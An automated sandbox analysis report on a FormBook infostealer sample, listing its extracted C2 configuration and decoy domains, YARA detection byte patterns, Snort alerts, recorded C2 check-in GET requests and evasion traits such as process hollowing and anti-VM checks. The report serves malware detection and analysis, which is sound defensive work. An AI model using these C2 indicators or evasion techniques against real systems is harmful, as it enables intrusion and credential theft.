Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report hvEop8Y70Y.exe

Overview

General Information

Sample Name:hvEop8Y70Y.exe
Analysis ID:383848
MD5:bd7e988ed1d92f9faf32f6a817d89329
SHA1:4ab28bec26ad120653ca060a4c735befded7551e
SHA256:94b77677478f890b5f9e0561aebc0f66b1b2fc4494d016e9b5a70ed0ba20980b
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • hvEop8Y70Y.exe (PID: 6364 cmdline: 'C:\Users\user\Desktop\hvEop8Y70Y.exe' MD5: BD7E988ED1D92F9FAF32F6A817D89329)
    • hvEop8Y70Y.exe (PID: 6668 cmdline: C:\Users\user\Desktop\hvEop8Y70Y.exe MD5: BD7E988ED1D92F9FAF32F6A817D89329)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 3536 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6776 cmdline: /c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.hvEop8Y70Y.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.hvEop8Y70Y.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.hvEop8Y70Y.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        0.2.hvEop8Y70Y.exe.2f43d44.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          4.2.hvEop8Y70Y.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 2 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: hvEop8Y70Y.exeAvira: detected
            Found malware configurationShow sources
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: hvEop8Y70Y.exeVirustotal: Detection: 25%Perma Link
            Source: hvEop8Y70Y.exeReversingLabs: Detection: 29%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: hvEop8Y70Y.exeJoe Sandbox ML: detected
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: hvEop8Y70Y.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: hvEop8Y70Y.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: hvEop8Y70Y.exe, 00000004.00000002.312279182.00000000014B0000.00000040.00000001.sdmp, raserver.exe, 0000000E.00000002.509423103.000000000459F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: hvEop8Y70Y.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
            Source: Binary string: RAServer.pdbGCTL source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 52.58.78.16:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 52.58.78.16:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 52.58.78.16:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 198.148.114.222:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 198.148.114.222:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 198.148.114.222:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 172.67.187.138:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 172.67.187.138:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 172.67.187.138:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.102.136.180:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.okitmall.com/iu4d/
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=C3lw6nN8/wjOPd8oaAysox0kMoLppKhEiaq8wux9+N+u3aHHhZKc4gso1l+tbzGLEbBg&nflLiT=xPJxAxbPf HTTP/1.1Host: www.runcouver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=uttTwOCOH1jEV+6/PDkH2rgXUcJbpZgk8NMf80qhjrLzhrhL9Yums4YmXY+CUKk4Lsjl&nflLiT=xPJxAxbPf HTTP/1.1Host: www.aa29996.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf HTTP/1.1Host: www.ux300e.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=7Tv9DsBa2x/9+7rHtb45a2p9TOUpHuLwXvGhoZyRj+FM5Jpy0KtmokI2zSCU3HKaraDa&nflLiT=xPJxAxbPf HTTP/1.1Host: www.mvprunning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=dTiXV4CFE3yVJbJPtbi4kS8L9e4gDLsfvJEyPJQwpK+wIZV6SF5bJNAnffOAlybNEFfC&nflLiT=xPJxAxbPf HTTP/1.1Host: www.getboostphlo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf HTTP/1.1Host: www.okitmall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=y4JxQtggtXVUGlOHrdhsWpYE5Q5QdQRqM5s9avj6g1ZOxqioacxcZohZ3CHAJSRBFHfe&nflLiT=xPJxAxbPf HTTP/1.1Host: www.cqsjny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf HTTP/1.1Host: www.betbonusuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=a4TwvNFJUHZfYjxmJDGfKucvC3Kvi9GvZt2BYG7bsK78eAq1dsPAQngdGmiuB14d735P&nflLiT=xPJxAxbPf HTTP/1.1Host: www.yashaerotech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
            Source: Joe Sandbox ViewIP Address: 15.165.26.252 15.165.26.252
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=C3lw6nN8/wjOPd8oaAysox0kMoLppKhEiaq8wux9+N+u3aHHhZKc4gso1l+tbzGLEbBg&nflLiT=xPJxAxbPf HTTP/1.1Host: www.runcouver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=uttTwOCOH1jEV+6/PDkH2rgXUcJbpZgk8NMf80qhjrLzhrhL9Yums4YmXY+CUKk4Lsjl&nflLiT=xPJxAxbPf HTTP/1.1Host: www.aa29996.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf HTTP/1.1Host: www.ux300e.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=7Tv9DsBa2x/9+7rHtb45a2p9TOUpHuLwXvGhoZyRj+FM5Jpy0KtmokI2zSCU3HKaraDa&nflLiT=xPJxAxbPf HTTP/1.1Host: www.mvprunning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=dTiXV4CFE3yVJbJPtbi4kS8L9e4gDLsfvJEyPJQwpK+wIZV6SF5bJNAnffOAlybNEFfC&nflLiT=xPJxAxbPf HTTP/1.1Host: www.getboostphlo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf HTTP/1.1Host: www.okitmall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=y4JxQtggtXVUGlOHrdhsWpYE5Q5QdQRqM5s9avj6g1ZOxqioacxcZohZ3CHAJSRBFHfe&nflLiT=xPJxAxbPf HTTP/1.1Host: www.cqsjny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf HTTP/1.1Host: www.betbonusuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /iu4d/?AR6=a4TwvNFJUHZfYjxmJDGfKucvC3Kvi9GvZt2BYG7bsK78eAq1dsPAQngdGmiuB14d735P&nflLiT=xPJxAxbPf HTTP/1.1Host: www.yashaerotech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.runcouver.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 09:05:22 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=dfb3971d4184d632d73a1908cbee311771617872722; expires=Sat, 08-May-21 09:05:22 GMT; path=/; domain=.getboostphlo.com; HttpOnly; SameSite=LaxCF-Cache-Status: DYNAMICcf-request-id: 095253b1640000a8c13d238000000001Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F802H7kHqNcGEaM19LIsT0HTjHrjpPBTypNS7vtOf80a0axYnOpC46oJeo%2FijRhoiKFT5as3D5%2FwxLegLD2FcS%2FMFN%2BWUhKGAQQySsVBK6%2BbwWISsw%3D%3D"}],"group":"cf-nel"}NEL: {"max_age":604800,"report_to":"cf-nel"}Server: cloudflareCF-RAY: 63ca55623926a8c1-CDGalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 75 34 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /iu4d/ was not found on this server.</p></body></html>
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: hvEop8Y70Y.exeString found in binary or memory: http://tempuri.org/GridOneHSDataSet.xsd
            Source: hvEop8Y70Y.exeString found in binary or memory: http://tempuri.org/HighScoresDataSet.xsd
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, hvEop8Y70Y.exe, 00000000.00000003.246364868.0000000005DCD000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: hvEop8Y70Y.exe, 00000000.00000002.266638944.0000000005DC0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
            Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
            Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comcj
            Source: hvEop8Y70Y.exe, 00000000.00000003.238491766.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comic
            Source: hvEop8Y70Y.exe, 00000000.00000003.238413554.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: hvEop8Y70Y.exe, 00000000.00000003.240959056.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/Li
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: hvEop8Y70Y.exe, 00000000.00000003.240959056.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/omh#?oy
            Source: hvEop8Y70Y.exe, 00000000.00000003.240642231.0000000005DFD000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
